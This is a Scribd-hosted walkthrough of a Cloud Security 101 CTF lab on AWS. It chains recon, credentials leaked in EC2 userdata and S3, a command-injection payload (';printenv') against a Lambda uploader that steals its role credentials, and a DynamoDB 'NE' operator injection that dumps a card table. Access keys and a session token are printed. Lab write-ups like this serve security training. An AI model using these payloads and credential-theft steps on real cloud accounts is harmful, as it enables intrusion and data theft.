0% found this document useful (0 votes)
165 views47 pages

Cloud Security CTF Guide: Oct 30-Nov 3

This document provides instructions to complete a Cloud Security 101 CTF challenge. It describes 10 steps including discovering EC2 instances with metadata exposing credentials, S3 buckets containing flags, and a Lambda function with a command injection vulnerability that can be used to retrieve credentials for the role associated with the function.
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
165 views47 pages

Cloud Security CTF Guide: Oct 30-Nov 3

This document provides instructions to complete a Cloud Security 101 CTF challenge. It describes 10 steps including discovering EC2 instances with metadata exposing credentials, S3 buckets containing flags, and a Lambda function with a command injection vulnerability that can be used to retrieve credentials for the role associated with the function.
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd

Name Cloud Security 101 CTF: [Oct 30-Nov 3]

URL [Link]

Type CTF Weekly: All

Important Note: This document illustrates all the important steps required to complete this lab.
This is by no means a comprehensive step-by-step solution for this exercise. This is only
provided as a reference to various commands needed to complete this exercise and for your
further research on this topic. Also, note that the IP addresses and domain names might be
different in your lab.

When the lab is launched, the Access credentials for the read-only user account are provided.

Note:​ The credentials would be different with every lab start.

Step 1:​ On your local Linux machine, set up these credentials to be used for any further
requests.

Setting up a student profile with these credentials:

Command:​ aws configure --profile student

Now, enter the ​Access Key ID:​ AKIAUAWOPGE5ILIPDS5X


And the ​Secret Access Key:​ XKiZ2Yu/ks2aWr2b74edF4OMbs5Em97aeV+IeL6D

Leave the region name and the output format to their default values (i.e., none).
Step 2:​ Checking different services for information interesting from an attacker’s perspective.

Since it is a recon based challenge, try to access services like EC2, S3, Lambda, etc and see
what all is accessible using the profile configured above and look for something interesting from
an attacker’s perspective.

1. EC2 Instances:​ They might contain something interesting in their userdata (provisioning
scripts) like the hardcoded credentials or some confidential resource names / URLs.

Retrieving the list of instances along with more information on those instances:

Command:​ aws ec2 describe-instances --profile student

Notice that region must be specified to make the above request. This holds true for all the
services as they might be located in different regions and thus, the region name must be
specified to access those services.

The number of regions is finite and hence, it won’t be an issue to enumerate over all of those
and find out the interesting instances.

Use the following commands to look for instances in us-east-1, ap-southeast-1 and
ap-southeast-2 regions respectively:

Commands:
aws ec2 describe-instances --profile student --region us-east-1
aws ec2 describe-instances --profile student --region ap-southeast-1
aws ec2 describe-instances --profile student --region ap-southeast-2
Notice that the tags for the instance in ap-southeast-2 (Asia Pacific (Sydney)) region contain a
flag.

FLAG1:​ 0cd68e3e7763d993307b65ea0facf740

Looking for the instance userdata:

Command:​ aws ec2 describe-instance-attribute --attribute userData --instance-id


i-0e9da9de15b10ab58 --profile student --region ap-southeast-2
This instance doesn’t have any userdata. Looking for other instances in other regions:

Command:​ aws ec2 describe-instances --profile student --region eu-west-2

Checking the userdata for this instance:

Command:​ aws ec2 describe-instance-attribute --attribute userData --instance-id


i-0a0fd26b0e9fdd85b --profile student --region eu-west-2
This instance has userdata. It is base64-encoded.

Decoding the userdata:

Command:​ echo
IyEgL2Jpbi9iYXNoCgoKVVJMPSJodHRwczovLzI3NjM4NDY1NzcyMi5zaWduaW4uYXdzLmFtY
Xpvbi5jb20vY29uc29sZSIKSUFNX1VTRVJOQU1FPSJkYXZlIgpJQU1fUEFTU1dPUkQ9IkRhdj
NUaDNEZXZlbG9wZXIxMi8xMi8xOTkyIgpTM19SRUdJT049InVzLWVhc3QtMiIKUzNfQlVDS0V
UPSJkZXZlbG9wZXJzLXNlY3JldC1idWNrZXQiClMzX0ZPTERFUj0iZGF2ZS1zaGFyZWQtYnVj
a2V0IgoKCnB5dGhvbjMgZ2VuZXJhdGVfbGF5b3V0LnB5ICRVUkwgJElBTV9VU0VSTkFNRSA
kSUFNX1BBU1NXT1JEICRTM19SRUdJT04gJFMzX0JVQ0tFVCAkUzNfRk9MREVS | base64
-d
Notice that the userdata script contains the details of an S3 bucket.

Step 3:​ Checking the contents of the S3 bucket details obtained in the previous step.

Command:​ aws s3 ls s3://developers-secret-bucket --profile student --region us-east-2

Notice that the object listing is diabled on this bucket. This is where the object details come in
handy!

Retrieving the list of keys inside the bucket folder retrieved from the userdata script:

Commands:
aws s3 ls s3://developers-secret-bucket/dave-shared-bucket --profile student --region us-east-2
aws s3 ls s3://developers-secret-bucket/dave-shared-bucket/ --profile student --region us-east-2
Notice that there is a key named [Link] present in the bucket retrieved above.

Retrieving the flag:

Commands:
aws s3 cp s3://developers-secret-bucket/dave-shared-bucket/[Link] . --profile student --region
us-east-2
cat [Link]

FLAG2:​ 305f19a9072a580f2de275c57e5c16c0

Step 4:​ Listing all the S3 buckets accessible via the student profile credentials.

Command:​ aws s3 ls --profile student


Step 5:​ Accessing the "temporary-public-image-store" bucket.

Command:​ aws s3 ls s3://temporary-public-image-store --profile student

Notice that the List Objects permission is denied on this bucket as well.

Step 6:​ Checking for any other service to gain access to this S3 bucket.

Lambda:

Checking for the list of lambda functions using the student profile in different regions. It would be
found that in the ap-southeast-1 region, there is a lambda function that makes use of the above
bucket:

Command:​ aws lambda list-functions --profile student --region ap-southeast-1


Step 7:​ Retrieving the code for the lambda function discovered in the previous step.

Command:​ aws lambda get-function --function-name


serverlessrepo-image-uploader-uploader-RM72CSUT4KDA --profile student --region
ap-southeast-1

Use the link received in the above output to download the code for the lambda function.

Note:​ The link to download the code is valid for 10 minutes only!
The lambda function’s code is downloaded as a zip archive. Extracting the files:

Commands:
file
~/Downloads/serverlessrepo-image-uploader-uploader-RM72CSUT4KDA-047aaaaa-6128-4d7e
-99aa-fad8ec55b662
unzip
~/Downloads/serverlessrepo-image-uploader-uploader-RM72CSUT4KDA-047aaaaa-6128-4d7e
-99aa-fad8ec55b662 -d /tmp/webapp

The application code has been extracted to /tmp/webapp directory.

Since this is a nodejs application, looking for anything interesting that might lead to compromise
of the function like RCE, or some other injection vulnerability:

Command:​ grep exec /tmp/webapp/src/[Link]


The [Link] code contains a command injection issue where the exec function is used. The
payload ("key" parameter which would be the name of the uploaded file) is attacker controlled.

Also, if there is some error while uploading the file, the stdout variable containing the output of
the exec command is returned in the response.

Hence, using this vulnerability, the attacker can read the environment variables of the lambda
function and get the access credentials of the role attached to the lambda function.

Also, since this application is serving some backend logic (nodejs based), it must be using API
Gateway to expose the lambda function to the public.

Step 8:​ Determining the URL of the API Gateway to invoke the lambda function retrieved in the
previous step.

Checking the list of API Gateway REST APIs.

Command:​ aws apigateway get-rest-apis --profile student --region ap-southeast-1


Notice there is one REST API present in the ap-southeast-1 region and it has a name of
"image-uploader" which is related to the lambda function and the S3 bucket discovered before!

The ID of the REST API is: "cwlw44ht84"

REST API URL:​ ​[Link]

Accessing the endpoint in the browser says Forbidden.

Checking for the stages for this REST API:

Command:​ aws apigateway get-stages --rest-api-id cwlw44ht84 --profile student --region


ap-southeast-1
There are 2 stage names: ​Prod​ and ​Stage

Step 9:​ Accessing the ​Prod​ stage of the above discovered REST API.

URL:​ ​[Link]

A web page having the file upload feature opens up.


Step 10:​ Exploiting the command execution issue in the application to retrieve the access
credentials associated with the role attached to the lambda function.

On the web page available from the above retrieved URL, upload a file:

File to be uploaded:​ hello_world.txt

The uploaded file contains the text: "Hello, World!"

Note:​ Make sure to use BurpSuite to intercept all the HTTPS traffic.

Press Ctrl+R to send the above request to the Repeater window.

Now, append the following payload to the filename:

Payload:​ ;printenv

The above payload would execute the printenv command in the environment of the lambda
function and return the output containing the access credentials of the role associated with the
lambda function:
Setting the above obtained access credentials locally:

Commands:
export AWS_ACCESS_KEY_ID=ASIAUAWOPGE5OBKAUWG3
export AWS_SECRET_ACCESS_KEY=hrjhmLbSQbMOK7a2eYu+qEW+0NvKFj4WKv5Xszpr
export
AWS_SESSION_TOKEN=IQoJb3JpZ2luX2VjEAAaDmFwLXNvdXRoZWFzdC0xIkcwRQIgAr9W
Fwymd00sJk05EmTNpJxJIYgGStZA05d3Zo0p7SICIQCg57Smo2UyMx7EjsCvlbWLGa15UnQr6
YfHNAyr2JEWMyryAQhZEAAaDDI3NjM4NDY1NzcyMiIMVzzG9VLKUwIpW+uCKs8BuW/ovdAx
glXrwA7wqHHQwXEIYoHsiw6rAy30KQsRwtZe16vPTdqB4oZvTXbjnwnllnLm7/C+h0M95LDfAs
L6S+/ueihY/xGEvkxfjOZ489qc6ztAjAiNfTO6cjtq2ZH3cohzsUt5ta5+ppEomalg2fmOt+5HHyBuT7
hKzFbfCO9XmAOobZ/FHd76fXKC8dR+eiOWiiQ8JGjpJJjAPzelJ7K2OkiVPIUQz+seoas1BoBfwi
LHKtUFxKQmbKrJ2TqXvvJxX/bVB5crWcZUH/JEMPWQ7/wFOuAB2dmRBomn2lgfZYQ5AiR2B
fikOWPzNyASySO6lS4wUCFflCHItc4RsKcAJdi/TezaALLFYj+9j5g+jNLDx3hyeEUYRs0DONhS
Nz+ogFvi15xXmYXfAQNvOCMTGCUVOeZXsLMLg41K+FaE2PpaIpnVtN6Jz8DaCTJxs0O2Sa
Ue8rY7rHTbmz6YRWXZw1nZw4phRsArjmSYGRKyq/nGqJgdj07Q28J+TfsjUZHqZ1PE/6RDbw
8flikdDFa1krsH+qmgXX0c6fPvbYssBlKJ+IpjPFtiGSAb+7H2uL8ruyAS0IA=

Note:​ The exported access credentials can now be used without specifying any profile to the
aws cli command (or to the boto3 client).

Now using these credentials to access the S3 bucket (temporary-public-image-store) since the
lambda function would have access to the temporary-public-image-store bucket to upload the
files:

Commands:
aws s3 ls s3://temporary-public-image-store --region ap-southeast-1
aws s3 cp s3://temporary-public-image-store/[Link] . --region ap-southeast-1
cat [Link]
FLAG3:​ 58f4d2122f6e5e1e23bd0a313a7ba1af

Step 11:​ Retrieving the ARN of the resource over which an IAM user has excessive privileges.

Checking the different resources like S3, lambda etc to find out the privileges:

S3:​ Checking the list of buckets accessible to the access credentials of the student profile:

Command:​ aws s3 ls --profile student

Checking the bucket policy for the 4 buckets retrieved in the above step:

Commands:
aws s3api get-bucket-policy --bucket data-extractor-repo --profile student
aws s3api get-bucket-policy --bucket developers-secret-bucket --profile student
Command:​ aws s3api get-bucket-policy --bucket temporary-public-image-store --profile student

Command:​ aws s3api get-bucket-policy --bucket users-personal-files --profile student

The IAM user ​John​ has excessive privileges over a folder in the S3 bucket.
The ARN of the resource with excessive privileges:
arn:aws:s[Link]users-personal-files/Documents/james

Step 12:​ Checking CloudWatch logs for any interesting information.

Retrieving all the log groups:

Command:​ aws logs describe-log-groups --profile student --region us-east-1

Retrieving the log streams for the above found log group:

Command:​ aws logs describe-log-streams --log-group-name /aws/lambda/DataExtractor


--profile student --region us-east-1
Retrieving all the stream name associated with the above retrieved log group (using jq):

Command:​ aws logs describe-log-streams --log-group-name /aws/lambda/DataExtractor


--profile student --region us-east-1 | jq ".logStreams[] | .logStreamName"

The following commands get the logs from the streams present in the log group
/aws/lambda/DataExtractor​. The retrieved logs are stored in the [Link] file.

Commands:
aws logs get-log-events --log-group-name /aws/lambda/DataExtractor --log-stream-name
'2020/10/29/[$LATEST]81c6e324b37a46baa2078ba80d1f99bc' --start-time 1603674938
--profile student --region us-east-1 >> [Link]
aws logs get-log-events --log-group-name /aws/lambda/DataExtractor --log-stream-name
'2020/10/29/[1]2bca12fd29694c788bb259dd2e25d609' --start-time 1603674938 --profile student
--region us-east-1 >> [Link]
aws logs get-log-events --log-group-name /aws/lambda/DataExtractor --log-stream-name
'2020/10/29/[1]98c9d26d340a45c9a3ee878696a0c85a' --start-time 1603674938 --profile
student --region us-east-1 >> [Link]
aws logs get-log-events --log-group-name /aws/lambda/DataExtractor --log-stream-name
'2020/10/29/[2]1e1f0fb33d044c3e830fd562a619ba1d' --start-time 1603674938 --profile student
--region us-east-1 >> [Link]

Command:​ grep -i flag [Link]

Nothing interesting was found in this log group. Checking other log groups:

Command:​ aws logs describe-log-groups --profile student --region us-west-1

Getting all the log streams:

Command:​ aws logs describe-log-streams --log-group-name /aws/lambda/StressTester --profile


student --region us-west-1 | jq -r ".logStreams[] | .logStreamName"
Getting the logs from all the log streams obtained in the previous step and saving them in the
file [Link]:

Commands:
aws logs get-log-events --log-group-name /aws/lambda/StressTester --log-stream-name
'2020/10/29/[$LATEST]768a2fc06bd54764ba061fda9f770fcf' --start-time 1603674938 --profile
student --region us-west-1 > [Link]
aws logs get-log-events --log-group-name /aws/lambda/StressTester --log-stream-name
'2020/10/29/[$LATEST]c65c5b303ed4420985330713cd02ac06' --start-time 1603674938
--profile student --region us-west-1 >> [Link]
aws logs get-log-events --log-group-name /aws/lambda/StressTester --log-stream-name
'2020/10/29/[$LATEST]f9df679710734b6faf171077e7df08a0' --start-time 1603674938 --profile
student --region us-west-1 >> [Link]

Command:​ grep -i flag [Link]

FLAG5:​ POXdecOaIEFdOSidzH7pZOl8TwzLwxHK

Alternatively, use the following Python script (based on boto3) to get the CloudWatch logs:
Python Script:

import boto3
import json
import time
from [Link] import Config

config = Config(
region_name = 'us-west-1',
signature_version = 'v4',
retries = {
'max_attempts': 10,
'mode': 'standard'
}
)

boto3.setup_default_session(profile_name="student")

client = [Link]("logs", config = config)


all_streams = []

group_name = input("Enter Log Group Name: ")

stream_batch = client.describe_log_streams(logGroupName=group_name)
all_streams += stream_batch['logStreams']

while 'nextToken' in stream_batch:


stream_batch =
client.describe_log_streams(logGroupName=group_name,nextToken=stream_batch['nextToken'])
all_streams += stream_batch['logStreams']
print(len(all_streams))

stream_names = [stream['logStreamName'] for stream in all_streams]


out_to = open("[Link]", 'w')

for stream in stream_names:


logs_batch = client.get_log_events(logGroupName=group_name, logStreamName=stream)

for event in logs_batch['events']:


[Link]({'group': group_name, 'stream':stream })
out_to.write([Link](event) + '\n')

print(stream, ":", len(logs_batch['events']))


while 'nextToken' in logs_batch:
logs_batch = client.get_log_events(logGroupName=group_name, logStreamName=stream,
nextToken=logs_batch['nextToken'])

for event in logs_batch['events']:


[Link]({'group': group_name, 'stream':stream })
out_to.write([Link](event) + '\n')

Reference:​ ​[Link]

In order to get the CloudWatch logs, the log streams associated with the supplied log group are
retrieved and then the logs are retrieved.
When the number of logs in the stream are more, the logs are retrieved in the pagination
fashion. The nextToken is retrieved from the logs and would be used to get the logs ahead.

Running the above script to gather the logs in ​[Link]​ file:

Command:​ python3 [Link]

Retrieving the flag from the logs:

Command:​ grep -i flag [Link]


FLAG5:​ POXdecOaIEFdOSidzH7pZOl8TwzLwxHK

Alternatively, using awslogs utility to retrieve the CloudWatch Logs:

Setup the default region to ​us-west-1​ using aws cli:

Command:​ aws configure

Press enter for the Access Key ID and Secret Access Key and the region name must be
us-west-1. Keep the output format to its default value: None.

Now, retrieving the logs using the awslogs utility:

Command:​ awslogs get /aws/lambda/StressTester --profile student

It doesn’t retrieve any logs. It is because the default start time must be ahead of time at which
the last log was registered.

Hence, to retrieve the logs, using the --start flag:

Command:​ awslogs get /aws/lambda/StressTester --start '2d' --profile student | grep -i flag
FLAG5:​ POXdecOaIEFdOSidzH7pZOl8TwzLwxHK

Note:​ The number of days specified in the above command would increase as the time passes.
So those logs might be available only when the start date is less than the time at which the log
was recorded.

Step 13:​ Checking other S3 buckets for interesting information.

Command:​ aws s3 ls --profile student

Checking the contents of the ​data-extractor-repo​ bucket:

Command:​ aws s3api list-objects --bucket data-extractor-repo --profile student

Checking if the there are more versions of the objects in this bucket:
Command:​ aws s3api list-object-versions --bucket data-extractor-repo --profile student

Since all the entries are for [Link], retrieving the different versions for it:
Command:​ aws s3api list-object-versions --bucket data-extractor-repo --profile student | jq -r
".Versions[] | .VersionId"

Downloading all the versions for the [Link] archive:

Commands:
aws s3api get-object --bucket data-extractor-repo --key [Link] --version-id
S5l9yGDb_u0XR96U3tQexZMtmn1t6HUZ [Link] --profile student
aws s3api get-object --bucket data-extractor-repo --key [Link] --version-id
Fe2_PrN_yD_rgKffS2NqqGN1Yozxg0Jz [Link] --profile student
aws s3api get-object --bucket data-extractor-repo --key [Link] --version-id
gvX.eTnEDenuevPEbmJxrLXOscbQ_.l6 [Link] --profile student
Extracting the content of the zip archives and checking for any flags in there:

Commands:
unzip -o [Link]
grep -i flag lambda_function.py
unzip -o [Link]
grep -i flag lambda_function.py
FLAG6:​ lbg6HNDzO2nyzVnxHDd7uptrGldYVzVV

Checking the definition of this lambda function that contains the flag:

Command:​ less lambda_function.py


Notice the initial comments in the code. So, there is an API gateway that invokes the lambda
function. The lambda function in turn retrieves data from DynamoDB and sends it back to the
API Gateway.

Step 14:​ Retrieving the URL of the API Gateway.

Try different regions until some API Gateway’s REST APIs are retrieved:

Commands:
aws apigateway get-rest-apis --profile student --region us-east-1
aws apigateway get-rest-apis --profile student --region us-east-2
aws apigateway get-rest-apis --profile student --region us-west-1
aws apigateway get-rest-apis --profile student --region us-west-2
API Gateway URL:​ ​[Link]

Open the URL in the browser:


Checking the stages for the deployed API:

Command:​ aws apigateway get-stages --rest-api-id wjpu20uslg --profile student --region


us-west-2

The stage name is "card-details".

Step 15:​ Checking the resources for the REST API discovered in the previous step.

Command:​ aws apigateway get-resources --rest-api-id wjpu20uslg --profile student --region


us-west-2
Notice that there are 3 resources having paths /v1, /v2 and /latest. All of these resources have a
POST method.

Checking the code extracted from [Link]:

Command:​ unzip -o [Link]


Notice that this function takes the CardHolder parameter and it is then passed to the
getDataFromLambda function which extracts the data from the DynamoDB database.

Using the information gather from the above function, calling the resource /latest resource of the
REST API:

Command:​ curl -X POST


[Link] -d '{ "CardHolder":
"Random"}'

The response is empty. So the supplied card holder name doesn’t exist in DynamoDB.
There were 2 other endpoints as well, namely: ​/v1​ and ​/v2

These endpoints must be invoking the other lambda functions.

Step 16:​ Checking the list of lambda functions.

Command:​ aws lambda list-functions --profile student --region us-west-2

Step 17:​ Checking the versions of the DataExtractor function.

Command:​ aws lambda list-versions-by-function --function-name DataExtractor --profile student


--region us-west-2
Notice that there are 3 versions for the DataExtractor function. Notice that the Codesha256 of
the 3 function versions. The first one (latest) and the last one (version 2) having the same
SHA256 hash.

Hence, the latest and v2 are the same functions and v1 is a different function.

Step 18:​ Retrieving the code for v1 function.

Command:​ aws lambda get-function --function-name DataExtractor --qualifier 1 --profile student


--region us-west-2
Downloading the code using the above retrieved URL.

Commands:
ls ~/Downloads/
unzip ~/Downloads/DataExtractor-68356e6d-ca7c-4abf-885b-eb77f3b9070e -d /tmp/lambda

Command:​ vim /tmp/lambda/lambda_function.py


Notice that the lambda function (v1) accepts Operator parameter as well and that is passed to
the scan function to retrieve the data from DynamoDB.

Here, DynamoDB Injection is possible via this lambda function.

Step 19:​ Retrieving the data from DynamoDB using the injection attack.

Command:​ curl -X POST


[Link] -d '{ "CardHolder":
"Random", "Operator": "NE" }'
FLAG7:​ 6011805887357131

The whole database was dumped because the NE operator (Not Equal to) would get all the data
entries because there was no entry with the name "Random" in the database (as it was seen in
the previous request).

Another possible way to retrieve the DynamoDB flag would be to get it directly from the
database using the student profile access credentials, because the student user has read-only
access to all AWS services:

As it could be seen in the lambda_function.py code, the database is located in the us-east-1
region:

Command:​ head -n20 /tmp/lambda/lambda_function.py


Command:​ aws dynamodb list-tables --profile student --region us-east-1

Retrieving the data from the DynamoDB table:

Command:​ aws dynamodb scan --table-name CardDetails --profile student --region us-east-1
Retrieving the flag:

Command:​ aws dynamodb scan --table-name CardDetails --profile student --region us-east-1 |
grep -iC5 flag

FLAG7:​ 6011805887357131

References:

1. EC2 (​[Link]
2. S3 (​[Link]
3. API Gateway (​[Link]
4. Lambda (​[Link]
5. DynamDB (​[Link]
6. CloudWatch (​[Link]
7. AWS CLI (​[Link]
8. Boto3 (​[Link]
9. awslogs (​[Link]

You might also like